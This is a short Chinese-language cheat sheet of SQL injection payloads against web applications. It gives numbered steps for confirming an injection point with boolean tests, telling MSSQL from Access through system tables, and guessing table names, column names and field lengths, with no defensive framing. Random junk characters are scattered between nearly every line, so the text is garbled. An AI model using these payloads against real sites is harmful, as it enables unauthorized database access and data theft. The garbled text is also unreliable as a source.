1.判断是否有注入;and 1=1 ;and 1=2 s,"<+80%
2.初步判断是否是mssql ;and user>0 5 r"`c
?2%d;tW
3.注入参数是字符'and [查询条件] and ''=' h5U@Ys
fr;>`u[;
4.搜索时没过滤参数的'and [查询条件] and '%25'=' /lx\9S|
hkJ4,.
5.判断数据库系统 3@J0-w
V
z8o
;and (select count(*) from sysobjects)>0 mssql 5 1@V""m
|J'@-*5?[8
;and (select count(*) from msysobjects)>0 access 05LVfgJ'q
Cv>|>Ob#
)(9>r/bq
?&_ -,\t
6.猜数据库 ;and (select Count(*) from [数据库名])>0 CK 3]]{
EJ.oq*W!*J
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 hewX)
x
%L2eXL
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 k8F<j)"
I0(BKMp&